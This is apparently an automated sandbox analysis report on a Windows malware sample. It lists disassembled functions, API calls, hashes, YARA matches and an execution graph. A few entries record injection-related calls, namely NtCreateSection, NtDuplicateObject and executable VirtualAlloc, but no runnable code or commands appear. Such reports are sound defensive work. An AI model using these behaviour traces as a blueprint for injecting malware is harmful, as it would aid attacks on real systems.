                                                                                                                          • Opcode ID: 3fb263791fb83c8b8dbfce8bff536526753f8639889bf0faa2c122c60c7dff09
                                                                                                                          • Instruction ID: 43af1caa6e1e2796d0d4d407fea188f58e1abde3d4da025ed4faa3eda81c6ada
                                                                                                                          • Opcode Fuzzy Hash: 3fb263791fb83c8b8dbfce8bff536526753f8639889bf0faa2c122c60c7dff09
                                                                                                                          • Instruction Fuzzy Hash: 8A018CB2248205EADB015AA19C61A793725AF89724F300533F643B90F2C53D8612E72F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                            • Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                            • Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 490e1bb7ca6da89293a755df55bde596f28f108899220f1f099bf28d0d415e7d
                                                                                                                          • Instruction ID: aa4eb87d844f93062a1e7a8475ea347332f8cc58812ef86932872ada6f7bb1a9
                                                                                                                          • Opcode Fuzzy Hash: 490e1bb7ca6da89293a755df55bde596f28f108899220f1f099bf28d0d415e7d
                                                                                                                          • Instruction Fuzzy Hash: CE0162B2248205FBEB015A959C61E7D3726AB84715F304533F613790F2857D8613E62F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                            • Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                            • Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 2e5cde1ac6b5fc222ffa5442979b07c8ac61913a661388b6ec45f8ca3ae79770
                                                                                                                          • Instruction ID: e5bcf77e0712be884d61d54cd756556ba775c1addb04088e16cbc972d40e6034
                                                                                                                          • Opcode Fuzzy Hash: 2e5cde1ac6b5fc222ffa5442979b07c8ac61913a661388b6ec45f8ca3ae79770
                                                                                                                          • Instruction Fuzzy Hash: 970131B2248205FBEB006A959C61EBD3725AB54714F304533FA13790F6C57D8612EB6F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                            • Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                            • Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 64b01ba4855f7e29543c601e31a9ae0838b9258f53dade71314125a1117efe83
                                                                                                                          • Instruction ID: 5c74587649b894564cef358282e87687984336b0c1a41cd8d34a533d82ace082
                                                                                                                          • Opcode Fuzzy Hash: 64b01ba4855f7e29543c601e31a9ae0838b9258f53dade71314125a1117efe83
                                                                                                                          • Instruction Fuzzy Hash: 1901ADB2204205FAEB005AA49C51E793725AF84714F304233FA13BD0F2C27D8A12EB2F
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A3F69B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3C000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_a3c000_7E95.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction ID: 3ef41a3ea69900290bbbd78148262503647f639e0ca805db4b171048d85abeb6
                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction Fuzzy Hash: ED113C79A00208EFDB01DF98CA85E98BBF5AF08350F0580A4F9489B362D371EA50DF80
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                            • Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                            • Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: a0a8a6d31bb91f27d0c6b231cae05e69637896051607562321bb9c617dd814e6
                                                                                                                          • Instruction ID: b0cca15c8a2f1668c504eefccc166d1a869a39e6574cbbe7b6ac3bb4f9ea7934
                                                                                                                          • Opcode Fuzzy Hash: a0a8a6d31bb91f27d0c6b231cae05e69637896051607562321bb9c617dd814e6
                                                                                                                          • Instruction Fuzzy Hash: CDF06DB2248205FAEB006A959C61E7A3725AB84714F304533FA13790F2857D8612EB2F
                                                                                                                          APIs
                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041D326
                                                                                                                          • BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041D32E
                                                                                                                          • GetTimeFormatA.KERNEL32(00000000,00000000,?,0041F3B0,?,00000000), ref: 0041D363
                                                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041D36B
                                                                                                                          • GetConsoleAliasExesLengthA.KERNEL32 ref: 0041D371
                                                                                                                          • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041D37A
                                                                                                                          • GetProcessHandleCount.KERNEL32(00000000,00000000), ref: 0041D382
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 0041D390
                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041D3D0
                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041D3DF
                                                                                                                          • WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041D3F2
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0041D3F9
                                                                                                                          • SetThreadContext.KERNEL32(00000000,00000000), ref: 0041D401
                                                                                                                          • FindAtomA.KERNEL32(00000000), ref: 0041D408
                                                                                                                          • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041D429
                                                                                                                          • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041D43A
                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 0041D442
                                                                                                                          • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0041D452
                                                                                                                          • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041D487
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041D497
                                                                                                                          • OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041D4A9
                                                                                                                          • LocalAlloc.KERNEL32(00000000,0080889C), ref: 0041D4BF
                                                                                                                          • QueryMemoryResourceNotification.KERNEL32(00000000,?), ref: 0041D540
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_410000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Console$File$AliasCommHandleModuleOpenThread$AffinityAllocAtomBuildCompareConfigConnectContextCountDefaultDirectoryExchangeExesFindFormatInfoInterlockedLengthLocalLocaleMappingMaskMemoryMoveNameNamedNotificationOutputPipeProcessQueryReadResourceStringSystemTimeTimerTypeWaitableWindowsWrite
                                                                                                                          • String ID: gf@
                                                                                                                          • API String ID: 2514727072-4154624262
                                                                                                                          • Opcode ID: 0ba5b5f047ba029ddcdf298e58d75a131cb95a39818ad51f03d4afb26bad6555
                                                                                                                          • Instruction ID: 8a1d21a96cce7193dfe34e1f32284ac7be4b5c90a43d68034c0f8cb0ec7ffe7d
                                                                                                                          • Opcode Fuzzy Hash: 0ba5b5f047ba029ddcdf298e58d75a131cb95a39818ad51f03d4afb26bad6555
                                                                                                                          • Instruction Fuzzy Hash: 0AA186F5904310AFD314EF65DCC4DABB7ADFB8C304F40893EFA8A92151D67899448B69
                                                                                                                          APIs
                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 0041D121
                                                                                                                          • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041D12F
                                                                                                                          • OpenJobObjectW.KERNEL32(00000000,00000000,0041F350), ref: 0041D13E
                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041D150
                                                                                                                          • RegCreateKeyA.ADVAPI32(00000000,0041F390,?), ref: 0041D15E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_410000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$CalendarComputerCreateInfoObjectOpenPathShort
                                                                                                                          • String ID: -$F
                                                                                                                          • API String ID: 808174175-2709719458
                                                                                                                          • Opcode ID: 6c9142031a2b5ed9112e9414d317d5773860ad35b8d33efb7404191363ddea47
                                                                                                                          • Instruction ID: fe56c437a454ea6c5f795bae894c8cd01d7ae09f61aea23a1609d43891937794
                                                                                                                          • Opcode Fuzzy Hash: 6c9142031a2b5ed9112e9414d317d5773860ad35b8d33efb7404191363ddea47
                                                                                                                          • Instruction Fuzzy Hash: 0731D5B5508341AFE320DF24DC41B9BBBE0BF88715F00492DF6989B191CB749589CB6B

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:0.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:6%
                                                                                                                          Total number of Nodes:1389
                                                                                                                          Total number of Limit Nodes:0
                                                                                                                          execution_graph 4634 404101 4635 404104 4634->4635 4638 40656a 4635->4638 4639 406589 4638->4639 4648 4042dd 4639->4648 4643 406679 4672 4016dd 4643->4672 4644 4065a1 _memset 4644->4643 4646 406639 SetUnhandledExceptionFilter UnhandledExceptionFilter 4644->4646 4646->4643 4649 4038c0 __decode_pointer 6 API calls 4648->4649 4650 4042e8 4649->4650 4650->4644 4651 4042ea 4650->4651 4654 4042f6 __initptd 4651->4654 4652 404352 4653 404333 4652->4653 4658 404361 4652->4658 4657 4038c0 __decode_pointer 6 API calls 4653->4657 4654->4652 4654->4653 4655 40431d 4654->4655 4661 404319 4654->4661 4656 403a93 __getptd_noexit 39 API calls 4655->4656 4659 404322 _siglookup 4656->4659 4657->4659 4660 401a58 __fileno 39 API calls 4658->4660 4663 4043c8 4659->4663 4665 4016dd _raise 43 API calls 4659->4665 4671 40432b __initptd 4659->4671 4662 404366 4660->4662 4661->4655 4661->4658 4664 4031d1 __fileno 6 API calls 4662->4664 4666 401c4d __lock 39 API calls 4663->4666 4667 4043d3 4663->4667 4664->4671 4665->4663 4666->4667 4668 4038b7 ___crtMessageBoxW 6 API calls 4667->4668 4669 404408 4667->4669 4668->4669 4675 40445e 4669->4675 4671->4644 4680 40159b 4672->4680 4674 4016ee 4676 404464 4675->4676 4677 40446b 4675->4677 4679 401b73 LeaveCriticalSection 4676->4679 4677->4671 4679->4677 4681 4015a7 __initptd 4680->4681 4682 401c4d __lock 39 API calls 4681->4682 4683 4015ae 4682->4683 4684 401667 __initterm 4683->4684 4686 4038c0 __decode_pointer 6 API calls 4683->4686 4697 4016b2 4684->4697 4688 4015e5 4686->4688 4688->4684 4690 4038c0 __decode_pointer 6 API calls 4688->4690 4695 4015fa 4690->4695 4691 4016a6 4693 4014ab _malloc 3 API calls 4691->4693 4692 4016af __initptd 4692->4674 4693->4692 4694 4038b7 6 API calls ___crtMessageBoxW 4694->4695 4695->4684 4695->4694 4696 4038c0 6 API calls __decode_pointer 4695->4696 4696->4695 4698 4016b8 4697->4698 4700 401693 4697->4700 4702 401b73 LeaveCriticalSection 4698->4702 4700->4692 4701 401b73 LeaveCriticalSection 4700->4701 4701->4691 4702->4700 4703 401906 4706 404a40 4703->4706 4705 40190b 4705->4705 4707 404a72 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4706->4707 4708 404a65 4706->4708 4709 404a69 4707->4709 4708->4707 4708->4709 4709->4705 5326 401fc6 5327 401fd9 HeapReAlloc 5326->5327 5328 40200d HeapAlloc 5326->5328 5329 401ffb 5327->5329 5332 401ff7 5327->5332 5330 402030 VirtualAlloc 5328->5330 5328->5332 5329->5328 5331 40204a HeapFree 5330->5331 5330->5332 5331->5332 5333 4018c7 5334 4018d6 5333->5334 5335 4018dc 5333->5335 5336 4016dd _raise 43 API calls 5334->5336 5339 401702 5335->5339 5336->5335 5338 4018e1 __initptd 5340 40159b _doexit 43 API calls 5339->5340 5341 40170d 5340->5341 5341->5338 5415 408587 5416 4085a0 5415->5416 5417 408598 5415->5417 5419 4085b2 5416->5419 5420 4085af CloseHandle 5416->5420 5417->5416 5418 40859d CloseHandle 5417->5418 5418->5416 5420->5419 4710 404909 4711 404946 4710->4711 4712 404927 GetEnvironmentStringsW 4710->4712 4714 40492f 4711->4714 4715 4049df 4711->4715 4713 40493b GetLastError 4712->4713 4712->4714 4713->4711 4716 404971 WideCharToMultiByte 4714->4716 4717 404962 GetEnvironmentStringsW 4714->4717 4718 4049e8 GetEnvironmentStrings 4715->4718 4719 40496a 4715->4719 4722 4049d4 FreeEnvironmentStringsW 4716->4722 4723 4049a5 4716->4723 4717->4716 4717->4719 4718->4719 4720 4049f8 4718->4720 4724 404ade __malloc_crt 39 API calls 4720->4724 4722->4719 4725 404ade __malloc_crt 39 API calls 4723->4725 4726 404a12 4724->4726 4727 4049ab 4725->4727 4728 404a25 ___crtGetEnvironmentStringsA 4726->4728 4729 404a19 FreeEnvironmentStringsA 4726->4729 4727->4722 4730 4049b3 WideCharToMultiByte 4727->4730 4732 404a2f FreeEnvironmentStringsA 4728->4732 4729->4719 4731 4049c5 4730->4731 4734 4049cd 4730->4734 4733 40100f ___crtGetEnvironmentStringsA 39 API calls 4731->4733 4732->4719 4733->4734 4734->4722 4735 40670c RtlUnwind 3834 40484e 3835 404863 3834->3835 3836 404868 GetModuleFileNameA 3834->3836 3845 405dc5 3835->3845 3837 40488f 3836->3837 3849 4046b4 3837->3849 3840 4048eb 3844 4046b4 _parse_cmdline 49 API calls 3844->3840 3846 405dd5 3845->3846 3847 405dce 3845->3847 3846->3836 3860 405c2b 3847->3860 3851 4046d3 3849->3851 3853 404740 3851->3853 4500 4066f4 3851->4500 3852 40483e 3852->3840 3855 404ade 3852->3855 3853->3852 3854 4066f4 49 API calls __wincmdln 3853->3854 3854->3853 3857 404ae7 3855->3857 3856 40112c _malloc 38 API calls 3856->3857 3857->3856 3858 4048d1 3857->3858 3859 404afe Sleep 3857->3859 3858->3840 3858->3844 3859->3857 3861 405c37 __initptd 3860->3861 3891 403b0c 3861->3891 3865 405c4a 3912 4059ca 3865->3912 3868 404ade __malloc_crt 39 API calls 3869 405c6b 3868->3869 3870 405d8a __initptd 3869->3870 3919 405a46 3869->3919 3870->3846 3873 405d97 3873->3870 3877 405daa 3873->3877 3879 40100f ___crtGetEnvironmentStringsA 39 API calls 3873->3879 3874 405c9b InterlockedDecrement 3875 405cab 3874->3875 3876 405cbc InterlockedIncrement 3874->3876 3875->3876 3929 40100f 3875->3929 3876->3870 3878 405cd2 3876->3878 3952 401a58 3877->3952 3878->3870 3942 401c4d 3878->3942 3879->3877 3883 405cbb 3883->3876 3884 405ce6 InterlockedDecrement 3886 405d62 3884->3886 3887 405d75 InterlockedIncrement 3884->3887 3886->3887 3889 40100f ___crtGetEnvironmentStringsA 39 API calls 3886->3889 3949 405d8c 3887->3949 3890 405d74 3889->3890 3890->3887 3955 403a93 GetLastError 3891->3955 3893 403b14 3894 403b21 3893->3894 3969 401457 3893->3969 3896 405926 3894->3896 3897 405932 __initptd 3896->3897 3898 403b0c __getptd 39 API calls 3897->3898 3899 405937 3898->3899 3900 405949 3899->3900 3901 401c4d __lock 39 API calls 3899->3901 3903 405957 __initptd 3900->3903 3907 401457 __amsg_exit 39 API calls 3900->3907 3902 405967 3901->3902 3904 4059b0 3902->3904 3905 405998 InterlockedIncrement 3902->3905 3906 40597e InterlockedDecrement 3902->3906 3903->3865 4070 4059c1 3904->4070 3905->3904 3906->3905 3909 405989 3906->3909 3907->3903 3909->3905 3910 40100f ___crtGetEnvironmentStringsA 39 API calls 3909->3910 3911 405997 3910->3911 3911->3905 4074 4031f7 3912->4074 3915 405a07 3917 405a0c GetACP 3915->3917 3918 4059f9 3915->3918 3916 4059e9 GetOEMCP 3916->3918 3917->3918 3918->3868 3918->3870 3920 4059ca getSystemCP 51 API calls 3919->3920 3921 405a66 3920->3921 3922 405a71 setSBCS 3921->3922 3924 405ab5 IsValidCodePage 3921->3924 3928 405ada _memset __setmbcp_nolock 3921->3928 4275 401000 3922->4275 3924->3922 3926 405ac7 GetCPInfo 3924->3926 3925 405c29 3925->3873 3925->3874 3926->3922 3926->3928 4265 405793 GetCPInfo 3928->4265 3931 40101b __initptd 3929->3931 3930 401094 __dosmaperr __initptd 3930->3883 3931->3930 3932 40105a 3931->3932 3934 401c4d __lock 37 API calls 3931->3934 3932->3930 3933 40106f HeapFree 3932->3933 3933->3930 3935 401081 3933->3935 3938 401032 ___sbh_find_block 3934->3938 3936 401a58 __fileno 37 API calls 3935->3936 3937 401086 GetLastError 3936->3937 3937->3930 3941 40104c 3938->3941 4451 401cb0 3938->4451 4458 401065 3941->4458 3943 401c62 3942->3943 3944 401c75 EnterCriticalSection 3942->3944 4466 401b8a 3943->4466 3944->3884 3946 401c68 3946->3944 3947 401457 __amsg_exit 38 API calls 3946->3947 3948 401c74 3947->3948 3948->3944 4499 401b73 LeaveCriticalSection 3949->4499 3951 405d93 3951->3870 3953 403a93 __getptd_noexit 39 API calls 3952->3953 3954 401a5d 3953->3954 3954->3870 3974 40393b TlsGetValue 3955->3974 3957 403b00 SetLastError 3957->3893 3963 403af7 3966 40100f ___crtGetEnvironmentStringsA 36 API calls 3963->3966 3964 403adf 3994 4039ac 3964->3994 3968 403afd 3966->3968 3967 403ae7 GetCurrentThreadId 3967->3957 3968->3957 4059 402bf5 3969->4059 3971 401461 3972 4038c0 __decode_pointer 6 API calls 3971->3972 3973 401474 3972->3973 3973->3894 3975 403950 3974->3975 3976 40396b 3974->3976 3977 4038c0 __decode_pointer 6 API calls 3975->3977 3976->3957 3979 404b23 3976->3979 3978 40395b TlsSetValue 3977->3978 3978->3976 3980 404b2c 3979->3980 3982 403abe 3980->3982 3983 404b4a Sleep 3980->3983 4012 40292c 3980->4012 3982->3957 3984 4038c0 TlsGetValue 3982->3984 3983->3980 3985 4038d8 3984->3985 3986 4038f9 GetModuleHandleW 3984->3986 3985->3986 3989 4038e2 TlsGetValue 3985->3989 3987 403914 GetProcAddress 3986->3987 3988 403909 3986->3988 3991 4038f1 3987->3991 4034 401427 3988->4034 3992 4038ed 3989->3992 3991->3963 3991->3964 3992->3986 3992->3991 4038 402744 3994->4038 3996 4039b8 GetModuleHandleW 3997 4039c8 3996->3997 3998 4039ce 3996->3998 4001 401427 __crt_waiting_on_module_handle 2 API calls 3997->4001 3999 4039e6 GetProcAddress GetProcAddress 3998->3999 4000 403a0a 3998->4000 3999->4000 4002 401c4d __lock 35 API calls 4000->4002 4001->3998 4003 403a29 InterlockedIncrement 4002->4003 4039 403a81 4003->4039 4006 401c4d __lock 35 API calls 4007 403a4a 4006->4007 4042 405f2c InterlockedIncrement 4007->4042 4009 403a68 4054 403a8a 4009->4054 4011 403a75 __initptd 4011->3967 4013 402938 __initptd 4012->4013 4014 402950 4013->4014 4023 40296f _memset 4013->4023 4015 401a58 __fileno 38 API calls 4014->4015 4016 402955 4015->4016 4024 4031d1 4016->4024 4018 4029e1 HeapAlloc 4018->4023 4020 401c4d __lock 38 API calls 4020->4023 4021 402965 __initptd 4021->3980 4023->4018 4023->4020 4023->4021 4027 402a28 4023->4027 4030 402c3d 4023->4030 4025 4038c0 __decode_pointer 6 API calls 4024->4025 4026 4031e1 __invoke_watson 4025->4026 4033 401b73 LeaveCriticalSection 4027->4033 4029 402a2f 4029->4023 4031 4038c0 __decode_pointer 6 API calls 4030->4031 4032 402c4d 4031->4032 4032->4023 4033->4029 4035 401432 Sleep GetModuleHandleW 4034->4035 4036 401450 4035->4036 4037 401454 4035->4037 4036->4035 4036->4037 4037->3987 4037->3991 4038->3996 4057 401b73 LeaveCriticalSection 4039->4057 4041 403a43 4041->4006 4043 405f4a InterlockedIncrement 4042->4043 4044 405f4d 4042->4044 4043->4044 4045 405f57 InterlockedIncrement 4044->4045 4046 405f5a 4044->4046 4045->4046 4047 405f64 InterlockedIncrement 4046->4047 4048 405f67 4046->4048 4047->4048 4049 405f71 InterlockedIncrement 4048->4049 4050 405f74 4048->4050 4049->4050 4051 405f8d InterlockedIncrement 4050->4051 4052 405f9d InterlockedIncrement 4050->4052 4053 405fa8 InterlockedIncrement 4050->4053 4051->4050 4052->4050 4053->4009 4058 401b73 LeaveCriticalSection 4054->4058 4056 403a91 4056->4011 4057->4041 4058->4056 4064 405483 4059->4064 4062 405483 __set_error_mode 39 API calls 4063 402c09 4062->4063 4063->3971 4065 405492 4064->4065 4066 401a58 __fileno 39 API calls 4065->4066 4067 402bfc 4065->4067 4068 4054b5 4066->4068 4067->4062 4067->4063 4069 4031d1 __fileno 6 API calls 4068->4069 4069->4067 4073 401b73 LeaveCriticalSection 4070->4073 4072 4059c8 4072->3900 4073->4072 4075 40320a 4074->4075 4081 403257 4074->4081 4076 403b0c __getptd 39 API calls 4075->4076 4077 40320f 4076->4077 4078 403237 4077->4078 4082 406092 4077->4082 4080 405926 __setmbcp 41 API calls 4078->4080 4078->4081 4080->4081 4081->3915 4081->3916 4083 40609e __initptd 4082->4083 4084 403b0c __getptd 39 API calls 4083->4084 4085 4060a3 4084->4085 4086 4060d1 4085->4086 4088 4060b5 4085->4088 4087 401c4d __lock 39 API calls 4086->4087 4089 4060d8 4087->4089 4090 403b0c __getptd 39 API calls 4088->4090 4097 406054 4089->4097 4092 4060ba 4090->4092 4095 4060c8 __initptd 4092->4095 4096 401457 __amsg_exit 39 API calls 4092->4096 4095->4078 4096->4095 4098 406058 4097->4098 4099 40608a 4097->4099 4098->4099 4100 405f2c ___addlocaleref 8 API calls 4098->4100 4105 4060fc 4099->4105 4101 40606b 4100->4101 4101->4099 4108 405fbb 4101->4108 4264 401b73 LeaveCriticalSection 4105->4264 4107 406103 4107->4092 4109 405fcc InterlockedDecrement 4108->4109 4110 40604f 4108->4110 4111 405fe1 InterlockedDecrement 4109->4111 4112 405fe4 4109->4112 4110->4099 4122 405de3 4110->4122 4111->4112 4113 405ff1 4112->4113 4114 405fee InterlockedDecrement 4112->4114 4115 405ffb InterlockedDecrement 4113->4115 4116 405ffe 4113->4116 4114->4113 4115->4116 4117 406008 InterlockedDecrement 4116->4117 4118 40600b 4116->4118 4117->4118 4119 406024 InterlockedDecrement 4118->4119 4120 406034 InterlockedDecrement 4118->4120 4121 40603f InterlockedDecrement 4118->4121 4119->4118 4120->4118 4121->4110 4123 405e67 4122->4123 4124 405dfa 4122->4124 4125 405eb4 4123->4125 4126 40100f ___crtGetEnvironmentStringsA 39 API calls 4123->4126 4124->4123 4131 405e2e 4124->4131 4136 40100f ___crtGetEnvironmentStringsA 39 API calls 4124->4136 4132 405edb 4125->4132 4176 407b3b 4125->4176 4128 405e88 4126->4128 4130 40100f ___crtGetEnvironmentStringsA 39 API calls 4128->4130 4133 405e9b 4130->4133 4138 40100f ___crtGetEnvironmentStringsA 39 API calls 4131->4138 4151 405e4f 4131->4151 4135 405f20 4132->4135 4139 40100f 39 API calls ___crtGetEnvironmentStringsA 4132->4139 4140 40100f ___crtGetEnvironmentStringsA 39 API calls 4133->4140 4134 40100f ___crtGetEnvironmentStringsA 39 API calls 4141 405e5c 4134->4141 4142 40100f ___crtGetEnvironmentStringsA 39 API calls 4135->4142 4143 405e23 4136->4143 4137 40100f ___crtGetEnvironmentStringsA 39 API calls 4137->4132 4144 405e44 4138->4144 4139->4132 4145 405ea9 4140->4145 4146 40100f ___crtGetEnvironmentStringsA 39 API calls 4141->4146 4147 405f26 4142->4147 4152 407d15 4143->4152 4168 407cd0 4144->4168 4150 40100f ___crtGetEnvironmentStringsA 39 API calls 4145->4150 4146->4123 4147->4099 4150->4125 4151->4134 4153 407d22 4152->4153 4167 407d9f 4152->4167 4154 407d33 4153->4154 4155 40100f ___crtGetEnvironmentStringsA 39 API calls 4153->4155 4156 407d45 4154->4156 4157 40100f ___crtGetEnvironmentStringsA 39 API calls 4154->4157 4155->4154 4158 40100f ___crtGetEnvironmentStringsA 39 API calls 4156->4158 4162 407d57 4156->4162 4157->4156 4158->4162 4159 40100f ___crtGetEnvironmentStringsA 39 API calls 4160 407d69 4159->4160 4161 407d7b 4160->4161 4163 40100f ___crtGetEnvironmentStringsA 39 API calls 4160->4163 4164 407d8d 4161->4164 4165 40100f ___crtGetEnvironmentStringsA 39 API calls 4161->4165 4162->4159 4162->4160 4163->4161 4166 40100f ___crtGetEnvironmentStringsA 39 API calls 4164->4166 4164->4167 4165->4164 4166->4167 4167->4131 4169 407cdd 4168->4169 4175 407d11 4168->4175 4170 407ced 4169->4170 4171 40100f ___crtGetEnvironmentStringsA 39 API calls 4169->4171 4172 407cff 4170->4172 4173 40100f ___crtGetEnvironmentStringsA 39 API calls 4170->4173 4171->4170 4174 40100f ___crtGetEnvironmentStringsA 39 API calls 4172->4174 4172->4175 4173->4172 4174->4175 4175->4151 4177 407b4c 4176->4177 4263 405ed4 4176->4263 4178 40100f ___crtGetEnvironmentStringsA 39 API calls 4177->4178 4179 407b54 4178->4179 4180 40100f ___crtGetEnvironmentStringsA 39 API calls 4179->4180 4181 407b5c 4180->4181 4182 40100f ___crtGetEnvironmentStringsA 39 API calls 4181->4182 4183 407b64 4182->4183 4184 40100f ___crtGetEnvironmentStringsA 39 API calls 4183->4184 4185 407b6c 4184->4185 4186 40100f ___crtGetEnvironmentStringsA 39 API calls 4185->4186 4187 407b74 4186->4187 4188 40100f ___crtGetEnvironmentStringsA 39 API calls 4187->4188 4189 407b7c 4188->4189 4190 40100f ___crtGetEnvironmentStringsA 39 API calls 4189->4190 4191 407b83 4190->4191 4192 40100f ___crtGetEnvironmentStringsA 39 API calls 4191->4192 4193 407b8b 4192->4193 4194 40100f ___crtGetEnvironmentStringsA 39 API calls 4193->4194 4195 407b93 4194->4195 4196 40100f ___crtGetEnvironmentStringsA 39 API calls 4195->4196 4197 407b9b 4196->4197 4198 40100f ___crtGetEnvironmentStringsA 39 API calls 4197->4198 4199 407ba3 4198->4199 4200 40100f ___crtGetEnvironmentStringsA 39 API calls 4199->4200 4201 407bab 4200->4201 4202 40100f ___crtGetEnvironmentStringsA 39 API calls 4201->4202 4203 407bb3 4202->4203 4204 40100f ___crtGetEnvironmentStringsA 39 API calls 4203->4204 4205 407bbb 4204->4205 4206 40100f ___crtGetEnvironmentStringsA 39 API calls 4205->4206 4207 407bc3 4206->4207 4208 40100f ___crtGetEnvironmentStringsA 39 API calls 4207->4208 4209 407bcb 4208->4209 4210 40100f ___crtGetEnvironmentStringsA 39 API calls 4209->4210 4211 407bd6 4210->4211 4212 40100f ___crtGetEnvironmentStringsA 39 API calls 4211->4212 4213 407bde 4212->4213 4214 40100f 